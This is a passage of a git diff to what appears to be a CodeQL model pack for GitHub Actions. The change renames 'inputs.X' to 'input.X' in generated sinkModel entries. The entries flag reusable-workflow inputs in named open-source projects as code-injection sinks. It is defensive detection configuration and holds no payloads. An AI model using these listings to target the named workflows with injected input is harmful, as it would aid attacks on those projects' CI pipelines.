b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["rocketchat/rocket.chat/.github/workflows/ci-test-e2e.yml", "*", "inputs.total-shard", "code-injection", "generated"] \ No newline at end of file + - ["rocketchat/rocket.chat/.github/workflows/ci-test-e2e.yml", "*", "input.total-shard", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml index 693d3abc03e1..465fff41145d 100644 --- a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ruby/ruby.wasm/.github/workflows/build.yml", "*", "inputs.prerel_name", "code-injection", "generated"] \ No newline at end of file + - ["ruby/ruby.wasm/.github/workflows/build.yml", "*", "input.prerel_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml index 119cbe465e6a..3f091f1c9613 100644 --- a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "inputs.target_version", "code-injection", "generated"] - - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "inputs.configuration", "code-injection", "generated"] - - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file + - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.target_version", "code-injection", "generated"] + - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.configuration", "code-injection", "generated"] + - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml index 2d35b933923f..efa591f749dd 100644 --- a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["saadeghi/daisyui/.github/workflows/write-release-notes.yml", "*", "inputs.daisyuiversion", "code-injection", "generated"] - - ["saadeghi/daisyui/.github/workflows/deploy-docs.yml", "*", "inputs.daisyuiversion", "code-injection", "generated"] \ No newline at end of file + - ["saadeghi/daisyui/.github/workflows/write-release-notes.yml", "*", "input.daisyuiversion", "code-injection", "generated"] + - ["saadeghi/daisyui/.github/workflows/deploy-docs.yml", "*", "input.daisyuiversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml index 7ca34fc3e44d..4bd74701fde7 100644 --- a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.stage", "code-injection", "generated"] - - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.targets_optional", "code-injection", "generated"] - - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.targets", "code-injection", "generated"] - - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.targets_pre", "code-injection", "generated"] - - ["sagemath/sage/.github/workflows/docker_hub.yml", "*", "inputs.dockerhub_repository", "code-injection", "generated"] - - ["sagemath/sage/.github/workflows/docker.yml", "*", "inputs.timeout", "code-injection", "generated"] - - ["sagemath/sage/.github/workflows/docker.yml", "*", "inputs.docker_push_repository", "code-injection", "generated"] \ No newline at end of file + - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.stage", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.targets_optional", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.targets", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.targets_pre", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/docker_hub.yml", "*", "input.dockerhub_repository", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/docker.yml", "*", "input.timeout", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/docker.yml", "*", "input.docker_push_repository", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml index d3cc8e73b708..34d11e19946b 100644 --- a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["schemastore/schemastore/src/test/github-workflow/reusable-workflow.yaml", "*", "inputs.constraints", "code-injection", "generated"] - - ["schemastore/schemastore/src/negative_test/github-workflow/reusable-workflow-input-must-declare-type.yaml", "*", "inputs.constraints", "code-injection", "generated"] \ No newline at end of file + - ["schemastore/schemastore/src/test/github-workflow/reusable-workflow.yaml", "*", "input.constraints", "code-injection", "generated"] + - ["schemastore/schemastore/src/negative_test/github-workflow/reusable-workflow-input-must-declare-type.yaml", "*", "input.constraints", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml index a9f8401aab2d..fb4a82488530 100644 --- a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["scikit-learn/scikit-learn/.github/workflows/update_tracking_issue.yml", "*", "inputs.job_status", "code-injection", "generated"] \ No newline at end of file + - ["scikit-learn/scikit-learn/.github/workflows/update_tracking_issue.yml", "*", "input.job_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml index acf43426e564..ef3af44da3a8 100644 --- a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "inputs.run", "code-injection", "generated"] - - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "inputs.ruby-version", "code-injection", "generated"] \ No newline at end of file + - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.run", "code-injection", "generated"] + - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.ruby-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml index 3c9178a91258..a8c86c49d7c0 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "inputs.latest", "code-injection", "generated"] - - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "inputs.tag", "code-injection", "generated"] - - ["shaka-project/shaka-packager/.github/workflows/build.yaml", "*", "inputs.self_hosted", "code-injection", "generated"] \ No newline at end of file + - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.latest", "code-injection", "generated"] + - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.tag", "code-injection", "generated"] + - ["shaka-project/shaka-packager/.github/workflows/build.yaml", "*", "input.self_hosted", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml index 24603c25a777..40549844d385 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.ignore_test_status", "code-injection", "generated"] - - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.test_filter", "code-injection", "generated"] - - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.browser_filter", "code-injection", "generated"] - - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.pr", "code-injection", "generated"] \ No newline at end of file + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.ignore_test_status", "code-injection", "generated"] + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.test_filter", "code-injection", "generated"] + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.browser_filter", "code-injection", "generated"] + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.pr", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml index 29f01c24bedd..bd180d9b3676 100644 --- a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["shimataro/ssh-key-action/.github/workflows/reusable-verify.yml", "*", "inputs.package_installation_command", "code-injection", "generated"] \ No newline at end of file + - ["shimataro/ssh-key-action/.github/workflows/reusable-verify.yml", "*", "input.package_installation_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml index acad489dbe51..1e5721f1e7c5 100644 --- a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["softfever/orcaslicer/.github/workflows/build_orca.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["softfever/orcaslicer/.github/workflows/build_deps.yml", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file + - ["softfever/orcaslicer/.github/workflows/build_orca.yml", "*", "input.arch", "code-injection", "generated"] + - ["softfever/orcaslicer/.github/workflows/build_deps.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml index e15b6d33042f..b7a14240aed5 100644 --- a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["software-mansion/react-native-reanimated/.github/workflows/build-npm-package-action.yml", "*", "inputs.option", "code-injection", "generated"] \ No newline at end of file + - ["software-mansion/react-native-reanimated/.github/workflows/build-npm-package-action.yml", "*", "input.option", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml index 12c9f97b7a40..1a276f8812f7 100644 --- a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["solana-labs/solana/.github/workflows/release-artifacts.yml", "*", "inputs.commit", "code-injection", "generated"] \ No newline at end of file + - ["solana-labs/solana/.github/workflows/release-artifacts.yml", "*", "input.commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml index 685944420aaa..ef448c8f4c0d 100644 --- a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "inputs.version", "code-injection", "generated"] - - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "inputs.branch", "code-injection", "generated"] \ No newline at end of file + - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.version", "code-injection", "generated"] + - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml index 884c3d154ad7..6c6721700258 100644 --- a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["speedb-io/speedb/.github/workflows/build_ubuntu_arm.yml", "*", "inputs.verSion", "code-injection", "generated"] - - ["speedb-io/speedb/.github/workflows/build_macos_ARM.yml", "*", "inputs.verSion", "code-injection", "generated"] \ No newline at end of file + - ["speedb-io/speedb/.github/workflows/build_ubuntu_arm.yml", "*", "input.verSion", "code-injection", "generated"] + - ["speedb-io/speedb/.github/workflows/build_macos_ARM.yml", "*", "input.verSion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml index 799958a7feef..b7104a8b6153 100644 --- a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spring-cloud/spring-cloud-dataflow/.github/workflows/build-images.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["spring-cloud/spring-cloud-dataflow/.github/workflows/build-images.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml index 32d3e59e1f8c..cd81a7239066 100644 --- a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "inputs.marks", "code-injection", "generated"] - - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "inputs.python-version", "code-injection", "generated"] - - ["sqlfluff/sqlfluff/.github/workflows/ci-test-dbt.yml", "*", "inputs.dbt-version", "code-injection", "generated"] \ No newline at end of file + - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.marks", "code-injection", "generated"] + - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.python-version", "code-injection", "generated"] + - ["sqlfluff/sqlfluff/.github/workflows/ci-test-dbt.yml", "*", "input.dbt-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml index f2893eb24070..1b2ce37480f5 100644 --- a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["stdlib-js/stdlib/.github/workflows/update_pr_copyright_years.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] - - ["stdlib-js/stdlib/.github/workflows/lint_autofix.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] - - ["stdlib-js/stdlib/.github/workflows/check_required_files.yml", "*", "inputs.user", "code-injection", "generated"] - - ["stdlib-js/stdlib/.github/workflows/check_required_files.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] \ No newline at end of file + - ["stdlib-js/stdlib/.github/workflows/update_pr_copyright_years.yml", "*", "input.pull_request_number", "code-injection", "generated"] + - ["stdlib-js/stdlib/.github/workflows/lint_autofix.yml", "*", "input.pull_request_number", "code-injection", "generated"] + - ["stdlib-js/stdlib/.github/workflows/check_required_files.yml", "*", "input.user", "code-injection", "generated"] + - ["stdlib-js/stdlib/.github/workflows/check_required_files.yml", "*", "input.pull_request_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml index ea3b2029f822..91889927c452 100644 --- a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.patch", "code-injection", "generated"] - - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.minor", "code-injection", "generated"] - - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.major", "code-injection", "generated"] - - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.preName", "code-injection", "generated"] - - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.pre", "code-injection", "generated"] \ No newline at end of file + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.patch", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.minor", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.major", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.preName", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.pre", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml index 0c5427134309..8d4400bd3ead 100644 --- a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "inputs.patch_path", "code-injection", "generated"] + - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "input.patch_path", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml index 4c0442abd2b5..29c7e1bd3e24 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["supabase/auth/.github/workflows/publish.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["supabase/auth/.github/workflows/publish.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml index 39c81d39066c..109dce9df0db 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["supabase/cli/.github/workflows/mirror-image.yml", "*", "inputs.image", "code-injection", "generated"] \ No newline at end of file + - ["supabase/cli/.github/workflows/mirror-image.yml", "*", "input.image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml index b5d1263f743f..e3643f0156b2 100644 --- a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "inputs.workflow_run", "code-injection", "generated"] - - ["tencent/hippy/.github/workflows/reuse_classify_commits.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] - - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "inputs.pull_request_head_sha", "code-injection", "generated"] - - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "input.workflow_run", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_classify_commits.yml", "*", "input.pull_request_number", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml index ffb08a8fa2e9..a4bba59b5a5c 100644 --- a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "inputs.map", "code-injection", "generated"] - - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "inputs.minor", "code-injection", "generated"] - - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "inputs.major", "code-injection", "generated"] \ No newline at end of file + - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.map", "code-injection", "generated"] + - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.minor", "code-injection", "generated"] + - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.major", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml index 4012908e7e9a..d12982c35a45 100644 --- a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["thesofproject/sof/.github/workflows/ipc_fuzzer.yml", "*", "inputs.fuzzing_duration_s", "code-injection", "generated"] \ No newline at end of file + - ["thesofproject/sof/.github/workflows/ipc_fuzzer.yml", "*", "input.fuzzing_duration_s", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml index a1af8280ebc7..deb10e5e4b4f 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tiann/kernelsu/.github/workflows/ksud.yml", "*", "inputs.target", "code-injection", "generated"] - - ["tiann/kernelsu/.github/workflows/avd-kernel.yml", "*", "inputs.manifest_name", "code-injection", "generated"] - - ["tiann/kernelsu/.github/workflows/wsa-kernel.yml", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file + - ["tiann/kernelsu/.github/workflows/ksud.yml", "*", "input.target", "code-injection", "generated"] + - ["tiann/kernelsu/.github/workflows/avd-kernel.yml", "*", "input.manifest_name", "code-injection", "generated"] + - ["tiann/kernelsu/.github/workflows/wsa-kernel.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml index 84de5681fea5..5c22f0ffcb76 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tiledb-inc/tiledb/.github/workflows/ci-linux_mac.yml", "*", "inputs.asan", "code-injection", "generated"] - - ["tiledb-inc/tiledb/.github/workflows/append-release-cmake.yml", "*", "inputs.ref", "code-injection", "generated"] \ No newline at end of file + - ["tiledb-inc/tiledb/.github/workflows/ci-linux_mac.yml", "*", "input.asan", "code-injection", "generated"] + - ["tiledb-inc/tiledb/.github/workflows/append-release-cmake.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml index c9e8b5c23c0f..790e94c2aacd 100644 --- a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["toeverything/affine/.github/workflows/build-server-image.yml", "*", "inputs.flavor", "code-injection", "generated"] \ No newline at end of file + - ["toeverything/affine/.github/workflows/build-server-image.yml", "*", "input.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml index 80dde7f2fc0e..fedb21393bc3 100644 --- a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tracel-ai/burn/.github/workflows/publish-template.yml", "*", "inputs.crate", "code-injection", "generated"] \ No newline at end of file + - ["tracel-ai/burn/.github/workflows/publish-template.yml", "*", "input.crate", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml index 1ffaa4e1cd0f..f60fffb206e2 100644 --- a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tribler/tribler/.github/workflows/pytest_custom_ipv8.yml", "*", "inputs.ipv8-git-ref", "code-injection", "generated"] \ No newline at end of file + - ["tribler/tribler/.github/workflows/pytest_custom_ipv8.yml", "*", "input.ipv8-git-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml index 48b35d83c702..c7fe932aba20 100644 --- a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml +++ 